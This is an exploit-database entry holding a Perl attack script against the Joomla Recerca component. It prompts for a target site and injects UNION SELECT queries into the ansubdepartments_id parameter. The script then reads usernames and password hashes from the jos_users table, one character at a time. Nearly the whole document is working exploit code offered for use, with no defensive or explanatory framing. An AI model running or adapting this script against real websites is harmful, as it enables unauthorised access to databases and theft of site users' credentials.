Joomla Recerca component SQL Injection

2009-10-07T00:00:00
ID 1337DAY-ID-9884
Type zdt
Reporter Don Tukulesto
Modified 2009-10-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================
Joomla Recerca component SQL Injection
======================================

use HTTP::Request;
use LWP::UserAgent;
 
$cmsapp = 'Joomla Component com_recerca';
$vuln   = 'index.php?option=com_recerca&task=linia&ansubdepartments_id=';
$column = 'concat(username,0x3a,password)tukulesto';
$table  = 'jos_users';
$regexp = 'No elements defined';
$maxlen = 65;
 
my $OS = "$^O";
if ($OS eq 'MSWin32') { system("cls"); } else { system("clear"); }
 
printf "\n
                $cmsapp
 [x]====================================================[x]
  |           www[dot]IndonesianCoder[dot]com            |
 [x]====================================================[x]
 
\n";
 
print " [~] URL Path : "; chomp($web=<STDIN>);
print " [~] Valid ID : "; chomp($id=<STDIN>);
print " [~] Column   : "; chomp($columns=<STDIN>);
 
if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
 
print "\n\n [!] Exploiting $target ...\n\n";
&get_data;
print "\n\n [!] Exploit completed.\n\n";
 
sub get_data() {
    @columns = split(/,/, $columns);
    foreach $column (@columns) {
        print " [exploiting\@$web] SELECT $column FROM $table please wait...\n";
        syswrite(STDOUT, " [exploiting\@$web] $column\@$table > ", 255);
        for (my $i=1; $i<=$maxlen; $i++) {
            my $chr = 0;
            my $found = 1;
            my $char = 48;
            while (!$chr && $char<=90) {
                if(exploit($i,$char) !~ /$regexp/) {
                    $chr = 1;
                    $found = 1;
                    syswrite(STDOUT,chr($char),1);
                } else { $found = 0; }
                $char++;
            }
            if(!$chr) {
                $char = 97;
                while(!$chr && $char<=122) {
                    if(exploit($i,$char) !~ /$regexp/) {
                        $chr = 1;
                        $found = 1;
                        syswrite(STDOUT,chr($char),1);
                    } else { $found = 0; }
                    $char++;
                }
            }
            if (!$found) {
                print "\n"; last;
            }
        }
    }
}
 
sub exploit() {
    my $limit = $_[0];
    my $chars = $_[1];
    my $shits = '+union+select+1,2,3,'.$column.',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+'.$table.'--';
    my $inject = $target.$vuln.$id.$shits;
    my $content = get_content($inject);
    return $content;
}
 
sub get_content() {
    my $url = $_[0];
    my $req = HTTP::Request->new(GET => $url);
    my $ua  = LWP::UserAgent->new();
    $ua->timeout(15);
    my $res = $ua->request($req);
    if ($res->is_error){
        print "\n\n [!] Error, ".$res->status_line.".\n\n";
        exit;
    }
    return $res->content;
}



#  0day.today [2018-04-14]  #